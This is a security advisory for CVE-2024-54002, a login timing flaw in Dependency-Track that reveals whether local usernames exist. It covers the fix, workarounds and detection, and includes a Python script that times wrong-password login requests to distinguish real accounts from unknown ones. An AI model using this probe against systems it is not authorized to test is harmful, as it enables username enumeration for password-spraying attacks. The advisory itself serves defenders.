CVE-2024-54002
📋 TL;DR
This vulnerability lets an unauthenticated attacker enumerate valid usernames in Dependency-Track by measuring the response-time difference between login attempts for accounts that exist and accounts that do not. Only users managed in Dependency-Track's local database are affected; LDAP and OpenID Connect users are not. A list of confirmed usernames lowers the cost of follow-on attacks such as credential stuffing and password spraying.
💻 Affected Systems
- Dependency-Track
⚠️ Manual Verification Required
This CVE record does not carry version ranges, so automatic vulnerability detection cannot determine from the record alone whether your system is affected.
Why? The CVE database entry does not specify which versions are vulnerable (no version ranges provided by the vendor/NVD). Since the vendor's fix shipped in 4.12.2 (see below), treat any earlier release that has local database users as affected until you have verified otherwise.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers enumerate all local usernames, then run targeted password attacks (spraying, stuffing) against them, leading to unauthorized access to the SBOM, project and vulnerability data the instance manages and, through it, potential supply chain compromise.
Likely Case
Attackers discover some valid usernames, increasing success rate of subsequent credential-based attacks.
If Mitigated
Username enumeration provides limited value without additional vulnerabilities or weak credentials.
🎯 Exploit Status
Simple timing attack requiring no authentication: the attacker only needs network access to the login endpoint. Response times must be measured with enough precision to separate the two code paths, which in practice means several samples per candidate username rather than a single request.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.12.2
Vendor Advisory: https://github.com/DependencyTrack/dependency-track/security/advisories/GHSA-9w3m-hm36-w32w
Restart Required: Yes
Instructions:
1. Back up your Dependency-Track instance (database and configuration).
2. Stop the current instance.
3. Update to version 4.12.2 or later.
4. Restart the service.
5. Verify the update was successful: the running instance should report version 4.12.2 or later.
🔧 Temporary Workarounds
Rate Limiting
Implement rate limiting on the /api/v1/user/login endpoint to slow down enumeration attempts. This raises the cost of collecting timing samples but does not remove the timing difference itself.
Configure the web server, reverse proxy or application firewall in front of Dependency-Track to limit requests to /api/v1/user/login per source address.
Network Controls
Restrict access to the Dependency-Track login endpoint to trusted networks only.
Configure firewall rules to limit access to the Dependency-Track instance, so that only expected sources can reach the login endpoint at all.
🧯 If You Can't Patch
- Move users to LDAP or OpenID Connect authentication, which is not affected, and then disable or delete the remaining local database accounts; local accounts that are left in place stay enumerable.
- Deploy a WAF or reverse proxy with rate limiting and burst detection on the login endpoint. A WAF cannot detect or remove the timing signal itself; it only makes collecting enough samples slower and noisier.
🔍 How to Verify
Check if Vulnerable:
Send repeated login attempts with a wrong password to /api/v1/user/login for a username known to exist as a local database user and for a username that does not exist, and compare the response times. Interleave the two series and compare medians over many samples rather than single requests, so that server load and network jitter affect both equally. If the unknown username consistently responds noticeably faster, the system is vulnerable.
Check Version:
Check the Dependency-Track web interface (About dialog) or query the API server's version endpoint (/api/version) for the running version.
Verify Fix Applied:
After updating to 4.12.2 or later, repeat the same measurement: the median response times for valid and invalid usernames should no longer be distinguishable.
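The measurement described under "Check if Vulnerable" and "Verify Fix Applied", written out as an added example for this page (it is not Dependency-Track project code). It sends form-encoded login attempts with a deliberately wrong password to /api/v1/user/login for a known local user and for a username assumed not to exist, interleaving the two series, and compares medians. The base URL, the known username and the made-up unknown username are assumptions you replace; run it only against an instance you are authorized to test.

```python
"""Timing probe for the CVE-2024-54002 login discrepancy (added example, not project code)."""
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request

LOGIN_PATH = "/api/v1/user/login"  # Dependency-Track local-user login endpoint
WRONG_PASSWORD = "definitely-not-the-password"  # any wrong password; we want the 401 path


def time_login(base_url, username, password=WRONG_PASSWORD, timeout=10):
    """POST one form-encoded login attempt and return the round-trip time in seconds."""
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + LOGIN_PATH, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        err.read()  # 401 Unauthorized is the expected reply for a wrong password
    return time.perf_counter() - start


def collect_interleaved(base_url, known_user, unknown_user, samples=20):
    """Alternate known/unknown requests so both series see the same server conditions."""
    known, unknown = [], []
    for _ in range(samples):
        known.append(time_login(base_url, known_user))
        unknown.append(time_login(base_url, unknown_user))
    return known, unknown


def compare_timings(known, unknown, ratio_threshold=2.0):
    """Decide whether the two timing series are distinguishable.

    Before the fix, the unknown-user path skips the password-hash verification, so
    its median is markedly lower. Medians rather than means resist outliers from
    GC pauses or network hiccups. Returns (vulnerable, median_known, median_unknown).
    """
    median_known = statistics.median(known)
    median_unknown = statistics.median(unknown)
    vulnerable = median_unknown > 0 and (median_known / median_unknown) >= ratio_threshold
    return vulnerable, median_known, median_unknown


if __name__ == "__main__":
    # Assumed invocation: python probe.py https://dtrack.example.internal admin
    base, known_user = sys.argv[1], sys.argv[2]
    unknown_user = "no-such-user-cve-2024-54002"  # assumed not to exist on the target
    k, u = collect_interleaved(base, known_user, unknown_user)
    flag, mk, mu = compare_timings(k, u)
    verdict = "VULNERABLE (unknown user answers much faster)" if flag else "no clear signal"
    print(f"median known={mk:.4f}s unknown={mu:.4f}s -> {verdict}")
```

The known user must be a local database account, since LDAP and OpenID Connect users do not take the affected code path. The 2x median ratio is a conservative default for a test run over a LAN; over a noisy WAN link increase the sample count before lowering the threshold, and after patching expect the ratio to sit close to 1.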
📡 Detection & Monitoring
Log Indicators:
- Multiple failed login attempts with different usernames from the same source address
- Login attempts arriving at a regular, scripted cadence, often all with the same (wrong) password
Network Indicators:
- High volume of POST requests to /api/v1/user/login compared with the instance's normal login rate
- Requests with sequential or dictionary-based usernames
SIEM Query (pseudo-query; adapt field names and window syntax to your SIEM):
http_method="POST" AND uri_path="/api/v1/user/login"
| count by source_ip over a 1-minute window
| alert where count > 10
If the API server sits behind a reverse proxy, group on the client address the proxy records (for example X-Forwarded-For), not on the proxy's own address, or every request will appear to come from one source.